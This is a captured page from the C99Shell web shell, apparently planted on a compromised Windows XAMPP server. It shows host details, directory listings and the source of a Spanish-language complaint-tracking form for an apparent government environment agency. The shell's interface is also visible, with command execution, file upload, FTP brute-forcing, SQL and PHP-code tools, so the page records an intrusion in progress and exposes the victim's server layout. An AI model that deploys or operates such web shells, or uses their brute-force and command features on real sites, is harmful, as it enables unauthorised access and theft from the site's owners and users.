!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\quejas2006\   drwxrwxrwx
Free 7.28 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Copia de seguim1.php (4.25 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>
<head>
<title>Seguimiento de quejas WEB </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="../../dama/libreria/css/dama_classic.css" rel="stylesheet" type="text/css">
<script type="text/JavaScript">
function validar(formulario) {
//if (quejas.nombre.value.length > 1 &&  quejas.nombre.value.length < 4) {
//alert("Debe escribir un nombre válido");
//quejas.nombre.focus();
//return (false);
//}
if (quejas.numerorad.value.length < 1 &&  quejas.numerorad.value.length > 6) {
alert("Debe escribir un número de documento válido");
quejas.numerorad.focus();
return (false);
}
if (quejas.numerorad.value.length > 6) {
alert("Debe escribir un número de documento válido. Máx 12 NÚMEROS");
quejas.id.focus();
return (false);
}
//
  var checkOK = "0123456789";
  var checkStr = quejas.numerorad.value;
  var allValid = true;
  for (i = 0; i < checkStr.length; i++) {
    ch = checkStr.charAt(i);
    for (j = 0; j < checkOK.length; j++)
      if (ch == checkOK.charAt(j))
        break;
    if (j == checkOK.length) {
      allValid = false;
      break;
    }
  }
  if (!allValid) {
    alert("Escriba sólo Números en el campo \"Número de Identificación\".");
    formulario.numerorad.focus();
    return (false);
  }
//

//
}
</script>

</head>
<body>
<table width="550" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><img src="damaqueja.gif" width="550" height="80"></td>
  </tr>
  <tr> 
    <td><img src="seguim02.gif" width="550" height="40"></td>
  </tr>
  <tr> 
    <td><form method="post" name="quejas" onSubmit= "return validar(this)" action="procesaseguimiento.php" id="quejas">
        <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr> 
            <td height="86">
<div align="left"> 
                <p><br>
                </p>
                <table width="420" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td><div align="center" class="Titportada">Seguimiento del 
                        estado de una queja interpuesta ante la Secretar&iacute;a 
                        de Ambiente a trav&eacute;s de la p&aacute;gina web www.secretariadeambiente.gov.co</div></td>
                  </tr>
                </table>
                <p><span class="txt">Seleccione el a&ntilde;o de vigencia de su</label> 
                  queja y escriba el n&uacute;mero de radicaci&oacute;n.<br>
                  <br>
                  (Cuando usted radic&oacute; su queja, nuestro sistema le asign&oacute; 
                  un c&oacute;digo como el siguiente: 2008ER</span><span class="Titportada">XXXXXX</span><span class="txt">; 
                  donde </span><span class="Titportada">XXXXXX</span><span class="txt"> 
                  es un n&uacute;mero de hasta seis (6) d&iacute;gitos</span>)<br>
                  <br>
                </p>
                <table width="400" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr align="center" valign="top" class="Titportada"> 
                    <td>Vigencia:</td>
                    <td>C&oacute;digo</td>
                    <td>N&uacute;mero<br> <span class="txtpeq">(escriba s&oacute;lo 
                      n&uacute;meros en este campo) </span></td>
                    <td>&nbsp;</td>
                  </tr>
                  <tr> 
                    <td> <select name="vigencia" class = "capital" id="vigencia">
                    <option value="2008">2008</option>
                        <option value="2007">2007</option>
                        <option value="2006">2006</option>
                      </select></td>
                    <td><div align="center" class="capital">ER</div></td>
                    <td><div align="center"> 
                        <input name="numerorad" class="capital" type="text" id="numerorad2" size="6" maxlength="6">
                      </div></td>
                    <td><input name="Submit" type="submit" value="CONSULTAR"></td>
                  </tr>
                </table>
                <br>
              </div></td>
          </tr>
        </table>
        <br>
      </form></td>
  </tr>
</table>

<p>&nbsp;</p>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--